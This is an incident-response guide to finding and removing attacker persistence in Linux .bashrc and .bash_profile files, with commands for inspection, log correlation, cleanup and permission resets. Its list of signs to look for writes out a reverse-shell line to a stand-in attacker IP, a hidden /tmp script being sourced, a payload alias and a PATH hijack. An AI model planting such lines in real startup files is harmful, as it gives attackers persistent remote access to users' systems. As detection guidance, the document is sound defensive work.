Bash_rc & Bash_profile

Analyzing .bashrc and .bash_profile Files for Persistence

Attackers often modify user-specific startup files such as .bashrc and .bash_profile to maintain persistence. These files are executed during shell sessions, making them ideal for embedding malicious commands that run automatically.

---

Key Concepts

• .bashrc: Executes commands for non-login interactive shells. Commonly used for session customizations like aliases or environment variables.

• .bash_profile: Executes commands for login shells. Typically sets environment variables and runs startup commands.

---

Incident Response Steps

1. Identify .bashrc and .bash_profile Files

To locate all relevant files on the system:

find / -name '.bashrc' 2>/dev/null
find / -name '.bash_profile' 2>/dev/null

2. Analyze File Contents

Examine the contents of each file for suspicious entries.

Command:

cat /home/username/.bashrc
cat /home/username/.bash_profile

What to Look For:

• Reverse Shell Commands:

  bash -i >& /dev/tcp/attacker_ip/4444 0>&1

• Hidden Scripts: Commands referencing unusual or hidden scripts (e.g., /tmp/.hidden_script).

  source /tmp/.hidden_script

• Suspicious Aliases: Aliases overriding standard commands to execute malicious payloads.

  alias ls='ls; /malicious/script.sh'

• Malicious Environment Variable Manipulations: Modifying PATH or other critical environment variables to execute malicious binaries.

  export PATH="/malicious/bin:$PATH"

3. Cross-Check with User Activity

Determine if malicious commands were executed and track the timeline of changes.

• Check Last Modification Time:

  stat /home/username/.bashrc
  stat /home/username/.bash_profile

• Correlate with User Logins: Review logs to see if and when these files were executed during user sessions.

  grep bash /var/log/auth.log

4. Review Shell Activity Logs

Analyze user shell commands to identify unauthorized or unusual behavior:

grep "session opened" /var/log/auth.log
grep bash /var/log/auth.log

---

Eradication

1. Remove Malicious Entries

Edit the affected .bashrc and .bash_profile files to remove unauthorized commands.

Command:

nano /home/username/.bashrc
nano /home/username/.bash_profile

2. Reset Permissions

Ensure these files have correct permissions to prevent unauthorized edits:

Command:

chmod 644 /home/username/.bashrc
chmod 644 /home/username/.bash_profile

Verify ownership:

chown username:username /home/username/.bashrc
chown username:username /home/username/.bash_profile

3. Investigate Malicious Scripts

If references to external scripts are found:

• Locate the scripts:

  ls -la /tmp/.hidden_script

• Remove them securely:

  rm /tmp/.hidden_script

4. Inform and Educate Users

Advise users:

• To regularly review their startup files.

• Avoid running unknown or unverified commands.

---

Key Points

.bashrc and .bash_profile are common persistence points for attackers. By thoroughly analyzing these files for all users, responders can uncover hidden backdoors, remove malicious commands, and secure the system against future attacks. Regular monitoring and permission enforcement are essential to maintaining system integrity.